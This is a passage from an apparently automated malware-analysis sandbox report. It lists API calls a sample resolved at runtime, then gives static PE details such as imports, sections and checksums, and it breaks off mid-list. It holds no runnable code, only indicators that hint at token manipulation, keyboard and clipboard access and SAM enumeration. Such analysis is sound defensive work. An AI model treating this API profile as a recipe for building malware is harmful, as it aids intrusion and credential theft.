- "kernel32.dll.OpenEventW",
- "kernel32.dll.SetEvent",
- "kernel32.dll.LocalAlloc",
- "kernel32.dll.GetComputerNameW",
- "kernel32.dll.GetComputerNameA",
- "kernel32.dll.SetThreadPriority",
- "kernel32.dll.ResumeThread",
- "kernel32.dll.CreateSemaphoreW",
- "kernel32.dll.QueueUserAPC",
- "kernel32.dll.GetQueuedCompletionStatus",
- "kernel32.dll.GetThreadSelectorEntry",
- "kernel32.dll.TerminateThread",
- "kernel32.dll.GetThreadIOPendingFlag",
- "kernel32.dll.RequestWakeupLatency",
- "kernel32.dll.CreateThread",
- "kernel32.dll.ConvertFiberToThread",
- "kernel32.dll.FreeEnvironmentStringsA",
- "kernel32.dll.GetBinaryTypeA",
- "kernel32.dll.VirtualQueryEx",
- "kernel32.dll.LocalSize",
- "kernel32.dll.LocalReAlloc",
- "kernel32.dll.GlobalMemoryStatus",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.GlobalSize",
- "kernel32.dll.GlobalReAlloc",
- "kernel32.dll.GetVersion",
- "kernel32.dll.RtlCaptureContext",
- "kernel32.dll.DebugActiveProcessStop",
- "kernel32.dll.WaitForDebugEvent",
- "kernel32.dll.GetLocaleInfoW",
- "kernel32.dll.WaitForSingleObjectEx",
- "kernel32.dll.FreeLibraryAndExitThread",
- "kernel32.dll.EnumSystemLocalesW",
- "kernel32.dll.ReadConsoleW",
- "kernel32.dll.SetEnvironmentVariableA",
- "kernel32.dll.CopyFileExA",
- "kernel32.dll.GetSystemInfo",
- "user32.dll.GetThreadDesktop",
- "user32.dll.SendMessageW",
- "user32.dll.GetIconInfo",
- "user32.dll.GetClipboardOwner",
- "user32.dll.SetClipboardViewer",
- "user32.dll.EqualRect",
- "user32.dll.GetWindowRect",
- "user32.dll.GetWindowLongW",
- "user32.dll.OpenDesktopW",
- "user32.dll.FindWindowW",
- "user32.dll.PostMessageW",
- "user32.dll.GetDC",
- "user32.dll.IntersectRect",
- "user32.dll.EnumWindows",
- "user32.dll.IsWindowVisible",
- "user32.dll.SetTimer",
- "user32.dll.PostThreadMessageW",
- "user32.dll.SetWinEventHook",
- "user32.dll.SystemParametersInfoW",
- "user32.dll.WinHelpW",
- "user32.dll.TranslateMDISysAccel",
- "user32.dll.DefFrameProcW",
- "user32.dll.IsDialogMessageW",
- "user32.dll.LoadStringW",
- "user32.dll.LoadStringA",
- "user32.dll.DestroyIcon",
- "user32.dll.LoadIconA",
- "user32.dll.DestroyCursor",
- "user32.dll.GetWindowThreadProcessId",
- "user32.dll.FindWindowA",
- "user32.dll.IsRectEmpty",
- "user32.dll.InflateRect",
- "user32.dll.GetSysColorBrush",
- "user32.dll.HideCaret",
- "user32.dll.GetCaretBlinkTime",
- "user32.dll.SetCursor",
- "user32.dll.SetWindowTextA",
- "user32.dll.GetScrollPos",
- "user32.dll.SetScrollPos",
- "user32.dll.GetUserObjectInformationW",
- "user32.dll.EndPaint",
- "user32.dll.CloseDesktop",
- "user32.dll.SetActiveWindow",
- "user32.dll.UpdateWindow",
- "user32.dll.DrawTextW",
- "user32.dll.DrawTextA",
- "user32.dll.GetSubMenu",
- "user32.dll.EnableMenuItem",
- "user32.dll.DestroyMenu",
- "user32.dll.GetSystemMenu",
- "user32.dll.GetMenuState",
- "user32.dll.SetMenu",
- "user32.dll.LoadMenuIndirectW",
- "user32.dll.TranslateAcceleratorA",
- "user32.dll.IsWindowEnabled",
- "user32.dll.EnableWindow",
- "user32.dll.MsgWaitForMultipleObjects",
- "user32.dll.SetFocus",
- "user32.dll.IsCharUpperW",
- "user32.dll.CharNextA",
- "user32.dll.CharUpperW",
- "user32.dll.CharUpperA",
- "user32.dll.IsDlgButtonChecked",
- "user32.dll.GetDlgItemTextW",
- "user32.dll.GetDlgItemTextA",
- "user32.dll.GetDlgItem",
- "user32.dll.DialogBoxParamW",
- "user32.dll.CreateDialogParamW",
- "user32.dll.CreateDialogParamA",
- "user32.dll.IsZoomed",
- "user32.dll.AnyPopup",
- "user32.dll.BeginDeferWindowPos",
- "user32.dll.IsWindow",
- "user32.dll.InSendMessage",
- "user32.dll.CallWindowProcW",
- "user32.dll.DefWindowProcW",
- "user32.dll.DefWindowProcA",
- "user32.dll.AttachThreadInput",
- "user32.dll.SendMessageA",
- "user32.dll.PeekMessageW",
- "user32.dll.PeekMessageA",
- "user32.dll.GetMessageA",
- "user32.dll.SetWindowLongW",
- "user32.dll.PostQuitMessage",
- "user32.dll.GetCursorPos",
- "user32.dll.VkKeyScanExW",
- "user32.dll.MapVirtualKeyW",
- "user32.dll.GetAsyncKeyState",
- "user32.dll.OpenClipboard",
- "user32.dll.DispatchMessageW",
- "user32.dll.GetCursorInfo",
- "user32.dll.ChangeClipboardChain",
- "user32.dll.CloseClipboard",
- "user32.dll.EmptyClipboard",
- "user32.dll.OpenInputDesktop",
- "user32.dll.ReleaseDC",
- "user32.dll.SetClipboardData",
- "user32.dll.LoadKeyboardLayoutW",
- "user32.dll.SendMessageTimeoutW",
- "user32.dll.keybd_event",
- "user32.dll.GetSystemMetrics",
- "user32.dll.SetThreadDesktop",
- "user32.dll.GetKeyboardState",
- "user32.dll.ExitWindowsEx",
- "user32.dll.mouse_event",
- "user32.dll.MessageBoxA",
- "user32.dll.DestroyWindow",
- "user32.dll.CreateWindowExW",
- "user32.dll.RegisterClassExW",
- "user32.dll.ScrollDC",
- "user32.dll.GetMessageW",
- "gdi32.dll.GdiFlush",
- "gdi32.dll.SelectObject",
- "gdi32.dll.CreateCompatibleBitmap",
- "gdi32.dll.BitBlt",
- "gdi32.dll.CreateDIBSection",
- "gdi32.dll.CreateCompatibleDC",
- "gdi32.dll.RealizePalette",
- "gdi32.dll.GetDIBits",
- "gdi32.dll.GetDeviceCaps",
- "gdi32.dll.GetSystemPaletteEntries",
- "gdi32.dll.DeleteDC",
- "gdi32.dll.CreatePalette",
- "gdi32.dll.CreateRectRgnIndirect",
- "gdi32.dll.GetRegionData",
- "gdi32.dll.CombineRgn",
- "gdi32.dll.GetBitmapBits",
- "gdi32.dll.GetObjectW",
- "gdi32.dll.DeleteObject",
- "gdi32.dll.LPtoDP",
- "gdi32.dll.ExtTextOutA",
- "gdi32.dll.SetAbortProc",
- "gdi32.dll.StartPage",
- "gdi32.dll.StartDocW",
- "gdi32.dll.UpdateColors",
- "gdi32.dll.StretchBlt",
- "gdi32.dll.SelectPalette",
- "gdi32.dll.GetPaletteEntries",
- "gdi32.dll.GetMetaFileW",
- "gdi32.dll.Escape",
- "gdi32.dll.EqualRgn",
- "gdi32.dll.Ellipse",
- "gdi32.dll.CreateRectRgn",
- "gdi32.dll.CreateFontIndirectA",
- "comdlg32.dll.GetSaveFileNameW",
- "comdlg32.dll.GetSaveFileNameA",
- "comdlg32.dll.GetOpenFileNameW",
- "comdlg32.dll.ReplaceTextW",
- "comdlg32.dll.FindTextW",
- "comdlg32.dll.FindTextA",
- "comdlg32.dll.GetFileTitleW",
- "advapi32.dll.RegCreateKeyExA",
- "advapi32.dll.DeleteService",
- "advapi32.dll.ControlService",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.QueryServiceConfigW",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.ConvertSidToStringSidW",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.RegisterServiceCtrlHandlerExW",
- "advapi32.dll.SetTokenInformation",
- "advapi32.dll.SetServiceStatus",
- "advapi32.dll.CreateProcessAsUserW",
- "advapi32.dll.StartServiceCtrlDispatcherW",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.RegSetValueExA",
- "advapi32.dll.RegQueryValueExA",
- "advapi32.dll.OpenSCManagerA",
- "advapi32.dll.RegRestoreKeyW",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegOpenKeyA",
- "advapi32.dll.RegNotifyChangeKeyValue",
- "advapi32.dll.RegDeleteValueW",
- "advapi32.dll.RegCreateKeyA",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.CloseServiceHandle",
- "advapi32.dll.QueryServiceStatus",
- "advapi32.dll.CreateServiceW",
- "advapi32.dll.InitiateSystemShutdownExW",
- "advapi32.dll.AdjustTokenPrivileges",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.AccessCheck",
- "advapi32.dll.SetSecurityDescriptorOwner",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.GetSidSubAuthority",
- "advapi32.dll.IsValidSecurityDescriptor",
- "advapi32.dll.FreeSid",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.DuplicateToken",
- "advapi32.dll.GetLengthSid",
- "advapi32.dll.AddAccessAllowedAce",
- "advapi32.dll.SetSecurityDescriptorGroup",
- "advapi32.dll.RegDeleteKeyA",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.ImpersonateLoggedOnUser",
- "advapi32.dll.RevertToSelf",
- "advapi32.dll.RegQueryValueExW",
- "shell32.dll.SHGetSpecialFolderPathW",
- "shell32.dll.ShellExecuteW",
- "shell32.dll.ShellAboutW",
- "kernel32.dll.FlsFree",
- "kernel32.dll.InitOnceExecuteOnce",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.GetTickCount64",
- "kernel32.dll.GetFileInformationByHandleEx",
- "kernel32.dll.SetFileInformationByHandle",
- "kernel32.dll.InitializeConditionVariable",
- "kernel32.dll.WakeConditionVariable",
- "kernel32.dll.WakeAllConditionVariable",
- "kernel32.dll.SleepConditionVariableCS",
- "kernel32.dll.TryAcquireSRWLockExclusive",
- "kernel32.dll.SleepConditionVariableSRW",
- "kernel32.dll.CreateThreadpoolWork",
- "kernel32.dll.SubmitThreadpoolWork",
- "kernel32.dll.CloseThreadpoolWork",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetLocaleInfoEx",
- "api-ms-win-core-synch-l1-2-0.dll.InitializeConditionVariable",
- "api-ms-win-core-synch-l1-2-0.dll.SleepConditionVariableCS",
- "api-ms-win-core-synch-l1-2-0.dll.WakeAllConditionVariable",
- "kernel32.dll.WTSGetActiveConsoleSessionId",
- "ntdll.dll.RtlGetVersion",
- "dwmapi.dll.DwmIsCompositionEnabled",
- "kbdus.dll.#1",
- "kernel32.dll.GetNativeSystemInfo",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "kernel32.dll.GetThreadPreferredUILanguages",
- "kernel32.dll.SetThreadPreferredUILanguages",
- "kernel32.dll.LocaleNameToLCID",
- "kernel32.dll.LCIDToLocaleName",
- "kernel32.dll.GetSystemDefaultLocaleName",
- "oleaut32.dll.#283",
- "oleaut32.dll.#284",
- "kernel32.dll.RegOpenKeyExW",
- "ntdll.dll.EtwUnregisterTraceGuids",
- "sechost.dll.QueryServiceConfigW",
- "winsta.dll.WinStationRegisterNotificationEvent",
- "advapi32.dll.CreateWellKnownSid",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.RpcAsyncInitializeHandle",
- "rpcrt4.dll.NdrClientCall2",
- "rpcrt4.dll.NdrAsyncClientCall",
- "winsta.dll.WinStationIsSessionRemoteable",
- "wtsapi32.dll.WTSQuerySessionInformationW",
- "winsta.dll.WinStationQueryInformationW",
- "rpcrt4.dll.I_RpcExceptionFilter",
- "wtsapi32.dll.WTSFreeMemory",
- "wmisvc.dll.ServiceMain",
- "sechost.dll.RegisterServiceCtrlHandlerExW",
- "sechost.dll.SetServiceStatus",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.ReportEventW",
- "advapi32.dll.DeregisterEventSource",
- "advapi32.dll.WmiOpenBlock",
- "ole32.dll.CoGetClassObject",
- "ole32.dll.CoGetMarshalSizeMax",
- "ole32.dll.CoMarshalInterface",
- "ole32.dll.CoUnmarshalInterface",
- "ole32.dll.StringFromIID",
- "ole32.dll.CoGetPSClsid",
- "ole32.dll.CoReleaseMarshalData",
- "ole32.dll.DcomChannelSetHResult",
- "vssapi.dll.CreateWriter",
- "advapi32.dll.LookupAccountNameW",
- "samcli.dll.NetLocalGroupGetMembers",
- "samlib.dll.SamConnect",
- "rpcrt4.dll.NdrClientCall3",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamLookupNamesInDomain",
- "samlib.dll.SamOpenAlias",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamCloseHandle",
- "samlib.dll.SamGetMembersInAlias",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamLookupDomainInSamServer",
- "ole32.dll.StringFromCLSID",
- "oleaut32.dll.#4",
- "oleaut32.dll.#7",
- "propsys.dll.VariantToPropVariant",
- "wbemcore.dll.Reinitialize",
- "wbemsvc.dll.DllGetClassObject",
- "wbemsvc.dll.DllCanUnloadNow",
- "authz.dll.AuthzInitializeContextFromToken",
- "authz.dll.AuthzInitializeObjectAccessAuditEvent2",
- "authz.dll.AuthzAccessCheck",
- "authz.dll.AuthzFreeAuditEvent",
- "authz.dll.AuthzFreeContext",
- "authz.dll.AuthzInitializeResourceManager",
- "authz.dll.AuthzFreeResourceManager",
- "rpcrt4.dll.RpcBindingCreateW",
- "rpcrt4.dll.RpcBindingBind",
- "rpcrt4.dll.I_RpcMapWin32Status",
- "advapi32.dll.EventRegister",
- "advapi32.dll.EventUnregister",
- "advapi32.dll.EventWrite",
- "kernel32.dll.RegCloseKey",
- "kernel32.dll.RegSetValueExW",
- "kernel32.dll.RegQueryValueExW",
- "wmisvc.dll.IsImproperShutdownDetected",
- "wevtapi.dll.EvtRender",
- "wevtapi.dll.EvtNext",
- "wevtapi.dll.EvtClose",
- "wevtapi.dll.EvtQuery",
- "wevtapi.dll.EvtCreateRenderContext",
- "rpcrt4.dll.RpcBindingSetOption",
- "ole32.dll.CoCreateFreeThreadedMarshaler",
- "ole32.dll.CreateStreamOnHGlobal",
- "cryptsp.dll.CryptReleaseContext",
- "kernelbase.dll.InitializeAcl",
- "kernelbase.dll.AddAce",
- "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "kernel32.dll.IsThreadAFiber",
- "kernel32.dll.OpenProcessToken",
- "kernelbase.dll.GetTokenInformation",
- "kernelbase.dll.DuplicateTokenEx",
- "kernelbase.dll.AdjustTokenPrivileges",
- "kernel32.dll.SetThreadToken",
- "kernelbase.dll.CheckTokenMembership",
- "ole32.dll.CLSIDFromString",
- "kernelbase.dll.AllocateAndInitializeSid",
- "oleaut32.dll.#285",
- "oleaut32.dll.#286",
- "oleaut32.dll.#17",
- "oleaut32.dll.#20",
- "oleaut32.dll.#19",
- "oleaut32.dll.#25",
- "authz.dll.AuthzInitializeContextFromSid",
- "ole32.dll.CoGetCallContext",
- "ole32.dll.CoImpersonateClient",
- "ole32.dll.CoRevertToSelf",
- "ole32.dll.CoSwitchCallContext",
- "lpk.dll.LpkEditControl",
- "comctl32.dll.InitCommonControlsEx",
- "kernel32.dll.HeapSetInformation",
- "advapi32.dll.CheckTokenMembership",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "kernel32.dll.CreateWaitableTimerW",
- "kernel32.dll.SetWaitableTimer",
- "ole32.dll.CLSIDFromOle1Class",
- "clbcatq.dll.GetCatalogObject",
- "clbcatq.dll.GetCatalogObject2",
- "ole32.dll.NdrOleInitializeExtension",
- "msi.dll.QueryInstanceCount",
- "msi.dll.DllGetClassObject",
- "msi.dll.DllCanUnloadNow",
- "rpcrt4.dll.I_RpcBindingInqLocalClientPID",
- "ntdll.dll.WinSqmIsOptedIn",
- "netapi32.dll.NetGetJoinInformation",
- "netapi32.dll.NetApiBufferFree",
- "shlwapi.dll.UrlIsW",
- "ole32.dll.StgOpenStorage",
- "kernel32.dll.GetFileAttributesExW",
- "advapi32.dll.SaferCreateLevel",
- "advapi32.dll.SaferCloseLevel",
- "apphelp.dll.SdbInitDatabase",
- "apphelp.dll.SdbFindFirstMsiPackage_Str",
- "apphelp.dll.SdbReleaseDatabase",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "mscoree.dll.GetCORSystemDirectory",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumValueW",
- "kernel32.dll.SetThreadExecutionState",
- "sfc.dll.SfcIsKeyProtected",
- "goopdate.dll.DllEntry",
- "kernel32.dll.RtlCaptureStackBackTrace",
- "wkscli.dll.NetWkstaGetInfo",
- "kernel32.dll.CreateMutexExW",
- "rpcrt4.dll.UuidCreate",
- "psmachine.dll.DllGetClassObject",
- "psmachine.dll.DllCanUnloadNow",
- "winhttp.dll.WinHttpAddRequestHeaders",
- "winhttp.dll.WinHttpCheckPlatform",
- "winhttp.dll.WinHttpCloseHandle",
- "winhttp.dll.WinHttpConnect",
- "winhttp.dll.WinHttpCrackUrl",
- "winhttp.dll.WinHttpCreateUrl",
- "winhttp.dll.WinHttpDetectAutoProxyConfigUrl",
- "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
- "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
- "winhttp.dll.WinHttpGetProxyForUrl",
- "winhttp.dll.WinHttpOpen",
- "winhttp.dll.WinHttpOpenRequest",
- "winhttp.dll.WinHttpQueryAuthSchemes",
- "winhttp.dll.WinHttpQueryDataAvailable",
- "winhttp.dll.WinHttpQueryHeaders",
- "winhttp.dll.WinHttpQueryOption",
- "winhttp.dll.WinHttpReadData",
- "winhttp.dll.WinHttpReceiveResponse",
- "winhttp.dll.WinHttpSendRequest",
- "winhttp.dll.WinHttpSetDefaultProxyConfiguration",
- "winhttp.dll.WinHttpSetCredentials",
- "winhttp.dll.WinHttpSetOption",
- "winhttp.dll.WinHttpSetStatusCallback",
- "winhttp.dll.WinHttpSetTimeouts",
- "winhttp.dll.WinHttpWriteData",
- "shlwapi.dll.StrCmpNW",
- "shlwapi.dll.#153",
- "ws2_32.dll.GetAddrInfoW",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.#2",
- "ws2_32.dll.FreeAddrInfoW",
- "ws2_32.dll.#6",
- "ws2_32.dll.#5",
- "schannel.dll.SpUserModeInitialize",
- "ws2_32.dll.WSASend",
- "ws2_32.dll.WSARecv",
- "ncrypt.dll.SslOpenProvider",
- "ncrypt.dll.GetSChannelInterface",
- "bcryptprimitives.dll.GetHashInterface",
- "ncrypt.dll.SslIncrementProviderReferenceCount",
- "ncrypt.dll.SslImportKey",
- "bcryptprimitives.dll.GetCipherInterface",
- "ncrypt.dll.SslLookupCipherSuiteInfo",
- "ncrypt.dll.BCryptOpenAlgorithmProvider",
- "ncrypt.dll.BCryptGetProperty",
- "ncrypt.dll.BCryptCreateHash",
- "ncrypt.dll.BCryptHashData",
- "ncrypt.dll.BCryptFinishHash",
- "ncrypt.dll.BCryptDestroyHash",
- "crypt32.dll.CertGetCertificateChain",
- "userenv.dll.GetUserProfileDirectoryW",
- "sechost.dll.ConvertStringSidToSidW",
- "userenv.dll.RegisterGPNotification",
- "gpapi.dll.RegisterGPNotificationInternal",
- "cryptsp.dll.CryptAcquireContextA",
- "cryptsp.dll.CryptCreateHash",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptVerifySignatureA",
- "cryptsp.dll.CryptDestroyKey",
- "cryptsp.dll.CryptDestroyHash",
- "bcryptprimitives.dll.GetAsymmetricEncryptionInterface",
- "ncrypt.dll.BCryptImportKeyPair",
- "ncrypt.dll.BCryptVerifySignature",
- "ncrypt.dll.BCryptDestroyKey",
- "crypt32.dll.CertVerifyCertificateChainPolicy",
- "crypt32.dll.CertFreeCertificateChain",
- "crypt32.dll.CertDuplicateCertificateContext",
- "ncrypt.dll.SslEncryptPacket",
- "ncrypt.dll.SslDecryptPacket",
- "winsta.dll.WinStationEnumerateW",
- "winsta.dll.WinStationFreeMemory",
- "qmgr.dll.ServiceMain",
- "bitsigd.dll.InitializeEx",
- "upnp.dll.DllGetClassObject",
- "upnp.dll.DllCanUnloadNow",
- "rpcrt4.dll.RpcStringBindingComposeA",
- "rpcrt4.dll.RpcBindingFromStringBindingA",
- "rpcrt4.dll.RpcStringFreeA",
- "oleaut32.dll.DllGetClassObject",
- "oleaut32.dll.DllCanUnloadNow",
- "sxs.dll.SxsOleAut32MapIIDToProxyStubCLSID",
- "advapi32.dll.RegQueryValueW",
- "oleaut32.dll.BSTR_UserSize",
- "oleaut32.dll.BSTR_UserMarshal",
- "oleaut32.dll.BSTR_UserUnmarshal",
- "oleaut32.dll.BSTR_UserFree",
- "oleaut32.dll.VARIANT_UserSize",
- "oleaut32.dll.VARIANT_UserMarshal",
- "oleaut32.dll.VARIANT_UserUnmarshal",
- "oleaut32.dll.VARIANT_UserFree",
- "oleaut32.dll.LPSAFEARRAY_UserSize",
- "oleaut32.dll.LPSAFEARRAY_UserMarshal",
- "oleaut32.dll.LPSAFEARRAY_UserUnmarshal",
- "oleaut32.dll.LPSAFEARRAY_UserFree",
- "advapi32.dll.LogonUserW",
- "sspicli.dll.LogonUserExExW",
- "wtsapi32.dll.WTSQueryUserToken",
- "advapi32.dll.QueryAllTracesW",
- "ole32.dll.CoRegisterClassObject",
- "iphlpapi.dll.GetAdaptersAddresses",
- "rpcrt4.dll.UuidFromStringW",
- "radarrs.dll.WdiDiagnosticModuleMain",
- "radarrs.dll.WdiHandleInstance",
- "radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "GetCurrentThread",
- "address": "0x40a014"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40a018"
- },
- {
- "name": "GetTickCount",
- "address": "0x40a01c"
- },
- {
- "name": "GetProcAddress",
- "address": "0x40a020"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40a024"
- },
- {
- "name": "GetLastError",
- "address": "0x40a028"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x40a02c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x40a030"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x40a034"
- },
- {
- "name": "lstrlenA",
- "address": "0x40a038"
- },
- {
- "name": "GetVersionExA",
- "address": "0x40a03c"
- },
- {
- "name": "GetVersionExW",
- "address": "0x40a040"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x40a044"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40a048"
- },
- {
- "name": "VirtualAllocEx",
- "address": "0x40a04c"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40a050"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x40a054"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x40a058"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "DefWindowProcW",
- "address": "0x40a068"
- },
- {
- "name": "LoadStringW",
- "address": "0x40a06c"
- },
- {
- "name": "SetActiveWindow",
- "address": "0x40a070"
- },
- {
- "name": "ReleaseCapture",
- "address": "0x40a074"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x40a078"
- },
- {
- "name": "GetMenuStringW",
- "address": "0x40a07c"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x40a080"
- },
- {
- "name": "DestroyWindow",
- "address": "0x40a084"
- },
- {
- "name": "RegisterClassW",
- "address": "0x40a088"
- },
- {
- "name": "SendMessageW",
- "address": "0x40a08c"
- },
- {
- "name": "CreateWindowExW",
- "address": "0x40a090"
- },
- {
- "name": "SetWindowLongW",
- "address": "0x40a094"
- },
- {
- "name": "LoadIconA",
- "address": "0x40a098"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExW",
- "address": "0x40a000"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x40a004"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Add",
- "address": "0x40a00c"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "SetupDecompressOrCopyFileA",
- "address": "0x40a060"
- }
- ],
- "dll": "SETUPAPI.dll"
- },
- {
- "imports": [
- {
- "name": "_exit",
- "address": "0x40a0a0"
- },
- {
- "name": "_c_exit",
- "address": "0x40a0a4"
- },
- {
- "name": "_cexit",
- "address": "0x40a0a8"
- },
- {
- "name": "exit",
- "address": "0x40a0ac"
- },
- {
- "name": "_wcmdln",
- "address": "0x40a0b0"
- },
- {
- "name": "__wgetmainargs",
- "address": "0x40a0b4"
- },
- {
- "name": "_initterm",
- "address": "0x40a0b8"
- },
- {
- "name": "__setusermatherr",
- "address": "0x40a0bc"
- },
- {
- "name": "_adjust_fdiv",
- "address": "0x40a0c0"
- },
- {
- "name": "__p__commode",
- "address": "0x40a0c4"
- },
- {
- "name": "__p__fmode",
- "address": "0x40a0c8"
- },
- {
- "name": "__set_app_type",
- "address": "0x40a0cc"
- },
- {
- "name": "_controlfp",
- "address": "0x40a0d0"
- },
- {
- "name": "__dllonexit",
- "address": "0x40a0d4"
- },
- {
- "name": "_onexit",
- "address": "0x40a0d8"
- },
- {
- "name": "_except_handler3",
- "address": "0x40a0dc"
- },
- {
- "name": "_XcptFilter",
- "address": "0x40a0e0"
- }
- ],
- "dll": "msvcrt.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0002d30a",
- "overlay": {
- "size": "0x00001f00",
- "offset": "0x00025000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x0002d30a",
- "icon_hash": null,
- "entrypoint": "0x004083d6",
- "timestamp": "2019-06-12 20:02:55",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00008000",
- "entropy": "5.82",
- "raw_address": "0x00001000",
- "virtual_size": "0x000076b6",
- "characteristics_raw": "0xf0000020"
- },
- {
- "name": ".bss",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000000",
- "virtual_size": "0x00000030",
- "characteristics_raw": "0xc0000080"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0000a000",
- "size_of_data": "0x00001000",
- "entropy": "2.39",
- "raw_address": "0x00009000",
- "virtual_size": "0x0000061c",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0000b000",
- "size_of_data": "0x0001a000",
- "entropy": "6.12",
- "raw_address": "0x0000a000",
- "virtual_size": "0x00019d54",
- "characteristics_raw": "0xd0000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00025000",
- "size_of_data": "0x00001000",
- "entropy": "0.68",
- "raw_address": "0x00024000",
- "virtual_size": "0x0000025c",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a104",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000008c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00025000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00001f00"
- },
- {
- "virtual_address": "0x00025000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000118"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
